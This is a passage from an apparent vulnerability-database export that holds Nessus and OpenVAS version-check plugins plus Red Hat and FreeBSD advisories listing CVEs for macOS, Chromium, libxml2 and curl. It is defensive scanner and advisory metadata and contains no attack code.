94435,\n 96329\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2016-09-20\");\n\n script_name(english:\"macOS < 10.12 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is prior to\n10.10.5, 10.11.x prior to 10.11.6, or is not macOS 10.12. It is,\ntherefore, affected by multiple vulnerabilities in the following\ncomponents :\n\n - apache\n - apache_mod_php\n - Apple HSSPI Support\n - AppleEFIRuntime\n - AppleMobileFileIntegrity\n - AppleUCC\n - Application Firewall\n - ATS\n - Audio\n - Bluetooth\n - cd9660\n - CFNetwork\n - CommonCrypto\n - CoreCrypto\n - CoreDisplay\n - curl\n - Date & Time Pref Pane\n - DiskArbitration\n - File Bookmark\n - FontParser\n - IDS - Connectivity\n - ImageIO\n - Intel Graphics Driver\n - IOAcceleratorFamily\n - IOThunderboltFamily\n - Kerberos v5 PAM module\n - Kernel\n - libarchive\n - libxml2\n - libxpc\n - libxslt\n - mDNSResponder\n - NSSecureTextField\n - Perl\n - S2 Camera\n - Security\n - Terminal\n - WindowServer\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207170\");\n # https://lists.apple.com/archives/security-announce/2016/Sep/msg00006.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c49c769b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.12 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4658\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"IPS Community Suite RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nfixed_version = \"10.12\";\n\n# Patches exist for OS X Yosemite v10.10.5 and OS X El Capitan v10.11.6\n# https://support.apple.com/en-us/HT207275\n# Do NOT mark them as vuln\nif (\n # No 10.x patch below 10.10.5\n ver_compare(ver:version, fix:'10.10.5', strict:FALSE) == -1\n ||\n # No 10.11.x patch below 10.11.6\n (\n version =~\"^10\\.11($|[^0-9])\"\n &&\n ver_compare(ver:version, fix:'10.11.6', strict:FALSE) == -1\n )\n)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:21", "description": "The remote host is running a version of Mac OS X version 10.x prior to 10.12, and is affected by multiple vulnerabilities in the following components :\n\n - apache (CVE-2016-4694)\n - apache_mod_php (CVE-2016-5768, CVE-2016-5769, CVE-2016-5770, CVE-2016-5771, CVE-2016-5772, CVE-2016-5773, CVE-2016-6174, CVE-2016-6288, CVE-2016-6289, CVE-2016-6290, CVE-2016-6291, CVE-2016-6292, CVE-2016-6294, CVE-2016-6295, CVE-2016-6296, CVE-2016-6297)\n - Apple HSSPI Support (CVE-2016-4697)\n - AppleEFIRuntime (CVE-2016-4696)\n - AppleMobileFileIntegrity (CVE-2016-4698)\n - AppleUUC (CVE-2016-4699, CVE-2016-4700)\n - Application Firewall (CVE-2016-4701)\n - ATS (CVE-2016-4779)\n - Audio (CVE-2016-4702)\n - Bluetooth (CVE-2016-4703)\n - cd9660 (CVE-2016-4706)\n - CFNetwork (CVE-2016-4707, CVE-2016-4708)\n - CommonCrypto (CVE-2016-4711)\n - CoreCrypto (CVE-2016-4712)\n - CoreDisplay (CVE-2016-4713)\n - curl (CVE-2016-0755, CVE-2016-4606)\n - Date & Time Pref Pane (CVE-2016-4715)\n - DiskArbitration (CVE-2016-4716)\n - File Bookmark (CVE-2016-4717)\n - FontParser (CVE-2016-4718)\n - IDS - Connectivity (CVE-2016-4722)\n - Intel Graphics Driver (CVE-2016-4723, CVE-2016-7582)\n - IOAcceleratorFamily (CVE-2016-4724, CVE-2016-4725, CVE-2016-4726)\n - IOThunderboltFamily (CVE-2016-4727)\n - Kerberos v5 PAM module (CVE-2016-4745)\n - Kernel (CVE-2016-4771, CVE-2016-4772, CVE-2016-4773, CVE-2016-4774, CVE-2016-4775, CVE-2016-4776, CVE-2016-4777, CVE-2016-4778)\n - lib archive (CVE-2016-4736)\n - libxml2 (CVE-2016-4658, CVE-2016-5131)\n - libxpc (CVE-2016-4617)\n - libxslt (CVE-2016-4738)\n - mDNSResponder (CVE-2016-4739)\n - NSSecureTextField (CVE-2016-4742)\n - Perl (CVE-2016-4748, CVE-2016-4750)\n - Security (CVE-2016-4752, CVE-2016-4753)\n - Terminal (CVE-2016-4755)\n - WindowServer (CVE-2016-4709, CVE-2016-4710)", "cvss3": {}, "published": "2016-10-21T00:00:00", "type": "nessus", "title": "Mac OS X 10.x < 10.12 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0755", "CVE-2016-4606", "CVE-2016-4617", "CVE-2016-4658", "CVE-2016-4694", "CVE-2016-4696", "CVE-2016-4697", "CVE-2016-4698", "CVE-2016-4699", "CVE-2016-4700", "CVE-2016-4701", "CVE-2016-4702", "CVE-2016-4703", "CVE-2016-4706", "CVE-2016-4707", "CVE-2016-4708", "CVE-2016-4709", "CVE-2016-4710", "CVE-2016-4711", "CVE-2016-4712", "CVE-2016-4713", "CVE-2016-4715", "CVE-2016-4716", "CVE-2016-4717", "CVE-2016-4718", "CVE-2016-4722", "CVE-2016-4723", "CVE-2016-4724", "CVE-2016-4725", "CVE-2016-4726", "CVE-2016-4727", "CVE-2016-4736", "CVE-2016-4738", "CVE-2016-4739", "CVE-2016-4742", "CVE-2016-4745", "CVE-2016-4748", "CVE-2016-4750", "CVE-2016-4752", "CVE-2016-4753", "CVE-2016-4755", "CVE-2016-4771", "CVE-2016-4772", "CVE-2016-4773", "CVE-2016-4774", "CVE-2016-4775", "CVE-2016-4776", "CVE-2016-4777", "CVE-2016-4778", "CVE-2016-4779", "CVE-2016-5131", "CVE-2016-5768", "CVE-2016-5769", "CVE-2016-5770", "CVE-2016-5771", "CVE-2016-5772", "CVE-2016-5773", "CVE-2016-6174", "CVE-2016-6288", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-6295", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7582"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "9620.PRM", "href": "https://www.tenable.com/plugins/nnm/9620", "sourceData": "Binary data 9620.prm", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2023-05-25T14:36:41", "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 52.0.2743.82.\n\nSecurity Fix(es):\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information when visited by the victim. (CVE-2016-1706, CVE-2016-1708, CVE-2016-1709, CVE-2016-1710, CVE-2016-1711, CVE-2016-5127, CVE-2016-5128, CVE-2016-5129, CVE-2016-5130, CVE-2016-5131, CVE-2016-5132, CVE-2016-5133, CVE-2016-5134, CVE-2016-5135, CVE-2016-5136, CVE-2016-5137, CVE-2016-1705)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-26T05:05:36", "type": "redhat", "title": "(RHSA-2016:1485) Important: chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2018-06-07T05:04:10", "id": "RHSA-2016:1485", "href": "https://access.redhat.com/errata/RHSA-2016:1485", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-03T15:19:47", "description": "The libxml2 library is a development toolbox providing the implementation of various XML standards.\n\nSecurity Fix(es):\n\n* libxml2: Use after free triggered by XPointer paths beginning with range-to (CVE-2016-5131)\n\n* libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c (CVE-2017-15412)\n\n* libxml2: DoS caused by incorrect error detection during XZ decompression (CVE-2015-8035)\n\n* libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c (CVE-2018-14404)\n\n* libxml2: Unrestricted memory usage in xz_head() function in xzlib.c (CVE-2017-18258)\n\n* libxml2: Infinite loop caused by incorrect error detection during LZMA decompression (CVE-2018-14567)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.8 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-31T09:30:25", "type": "redhat", "title": "(RHSA-2020:1190) Moderate: libxml2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567"], "modified": "2020-03-31T10:09:57", "id": "RHSA-2020:1190", "href": "https://access.redhat.com/errata/RHSA-2020:1190", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T22:21:58", "description": "This release adds the new Apache HTTP Server 2.4.29 packages that are part\nof the JBoss Core Services offering.\n\nThis release serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.23, and includes bug fixes and enhancements. Refer\nto the Release Notes for information on the most significant bug fixes,\nenhancements and component upgrades included in this release.\n\nSecurity Fix(es):\n\n* expat: Out-of-bounds heap read on crafted input causing crash (CVE-2016-0718)\n* curl: escape and unescape integer overflows (CVE-2016-7167)\n* curl: Cookie injection for other servers (CVE-2016-8615)\n* curl: Case insensitive password comparison (CVE-2016-8616)\n* curl: Out-of-bounds write via unchecked multiplication (CVE-2016-8617)\n* curl: Double-free in curl_maprintf (CVE-2016-8618)\n* curl: Double-free in krb5 code (CVE-2016-8619)\n* curl: curl_getdate out-of-bounds read (CVE-2016-8621)\n* curl: URL unescape heap overflow via integer truncation (CVE-2016-8622)\n* curl: Use-after-free via shared cookies (CVE-2016-8623)\n* curl: Invalid URL parsing with '#' (CVE-2016-8624)\n* curl: IDNA 2003 makes curl use wrong host (CVE-2016-8625)\n* libxml2: out-of-bounds read (unfixed CVE-2016-4483 in JBCS) (CVE-2016-9598)\n* pcre: Out-of-bounds read in compile_bracket_matchingpath function (8.41/3) (CVE-2017-6004)\n* pcre: Invalid Unicode property lookup (8.41/7, 10.24/2) (CVE-2017-7186)\n* pcre: invalid memory read in_pcre32_xclass (pcre_xclass.c) (CVE-2017-7244)\n* pcre: stack-based buffer overflow write in pcre32_copy_substring (CVE-2017-7245)\n* pcre: stack-based buffer overflow write in pcre32_copy_substring (CVE-2017-7246)\n* curl: FTP PWD response parser out of bounds read (CVE-2017-1000254)\n* curl: IMAP FETCH response out of bounds read (CVE-2017-1000257)\n* curl: Heap-based buffer overflow in Curl_smtp_escape_eob() when uploading data over SMTP (CVE-2018-0500)\n\nDetails around this issue, including information about the CVE, severity of\nthe issue, and the CVSS score can be found on the CVE page listed in the\nReference section below.\n\nThe following packages have been upgraded to a newer upstream version:\n* Curl (7.57.0)\n* OpenSSL (1.0.2n)\n* Expat (2.2.5)\n* PCRE (8.41)\n* libxml2 (2.9.7)\n\nAcknowledgements:\n\nCVE-2017-1000254: Red Hat would like to thank Daniel Stenberg for reporting this issue.\nUpstream acknowledges Max Dymond as the original reporter.\nCVE-2017-1000257: Red Hat would like to thank the Curl project for reporting this issue. Upstream acknowledges Brian Carpenter, (the OSS-Fuzz project) as the original reporter.\nCVE-2018-0500: Red Hat would like to thank the Curl project for reporting this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-16T16:05:21", "type": "redhat", "title": "(RHSA-2018:2486) Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.29 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0718", "CVE-2016-4483", "CVE-2016-4975", "CVE-2016-5131", "CVE-2016-7167", "CVE-2016-8615", "CVE-2016-8616", "CVE-2016-8617", "CVE-2016-8618", "CVE-2016-8619", "CVE-2016-8621", "CVE-2016-8622", "CVE-2016-8623", "CVE-2016-8624", "CVE-2016-8625", "CVE-2016-9318", "CVE-2016-9596", "CVE-2016-9597", "CVE-2016-9598", "CVE-2017-1000254", "CVE-2017-1000257", "CVE-2017-18258", "CVE-2017-6004", "CVE-2017-7186", "CVE-2017-7244", "CVE-2017-7245", "CVE-2017-7246", "CVE-2017-9047", "CVE-2017-9048", "CVE-2017-9049", "CVE-2017-9050", "CVE-2018-0500"], "modified": "2018-09-05T05:26:14", "id": "RHSA-2018:2486", "href": "https://access.redhat.com/errata/RHSA-2018:2486", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2023-06-03T15:04:39", "description": "\n\nGoogle Chrome Releases reports:\n\n48 security fixes in this release, including:\n\n[610600] High CVE-2016-1706: Sandbox escape in PPAPI. Credit to\n\t Pinkie Pie xisigr of Tencent's Xuanwu Lab\n[613949] High CVE-2016-1708: Use-after-free in Extensions.\n\t Credit to Adam Varsan\n[614934] High CVE-2016-1709: Heap-buffer-overflow in sfntly.\n\t Credit to ChenQin of Topsec Security Team\n[616907] High CVE-2016-1710: Same-origin bypass in Blink.\n\t Credit to Mariusz Mlynski\n[617495] High CVE-2016-1711: Same-origin bypass in Blink.\n\t Credit to Mariusz Mlynski\n[618237] High CVE-2016-5127: Use-after-free in Blink. Credit\n\t to cloudfuzzer\n[619166] High CVE-2016-5128: Same-origin bypass in V8. Credit\n\t to Anonymous\n[620553] High CVE-2016-5129: Memory corruption in V8. Credit to\n\t Jeonghoon Shin\n[623319] High CVE-2016-5130: URL spoofing. Credit to Wadih\n\t Matar\n[623378] High CVE-2016-5131: Use-after-free in libxml. Credit\n\t to Nick Wellnhofer\n[607543] Medium CVE-2016-5132: Limited same-origin bypass in\n\t Service Workers. Credit to Ben Kelly\n[613626] Medium CVE-2016-5133: Origin confusion in proxy\n\t authentication. Credit to Patch Eudor\n[593759] Medium CVE-2016-5134: URL leakage via PAC script.\n\t Credit to Paul Stone\n[605451] Medium CVE-2016-5135: Content-Security-Policy bypass.\n\t Credit to kingxwy\n[625393] Medium CVE-2016-5136: Use after free in extensions.\n\t Credit to Rob Wu\n[625945] Medium CVE-2016-5137: History sniffing with HSTS and\n\t CSP. Credit to Xiaoyin Liu\n[629852] CVE-2016-1705: Various fixes from internal audits,\n\t fuzzing and other initiatives.\n\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-20T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-07-20T00:00:00", "id": "6FAE9FE1-5048-11E6-8AA7-3065EC8FD3EC", "href": "https://vuxml.freebsd.org/freebsd/6fae9fe1-5048-11e6-8aa7-3065ec8fd3ec.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-31T18:36:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-08-04T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:1918-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851374", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851374", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851374\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-08-04 16:27:28 +0530 (Thu, 04 Aug 2016)\");\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\",\n \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\",\n \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\",\n \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\",\n \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:1918-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium was updated to 52.0.2743.82 to fix the following security issues\n (boo#989901):\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other\n initiatives\");\n\n script_tag(name:\"affected\", value:\"Chromium on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1918-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-gnome\", rpm:\"chromium-desktop-gnome~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-kde\", rpm:\"chromium-desktop-kde~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo\", rpm:\"chromium-ffmpegsumo~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo-debuginfo\", rpm:\"chromium-ffmpegsumo-debuginfo~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:12:15", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-07-22T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-2016-07)-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310808265", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808265", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security 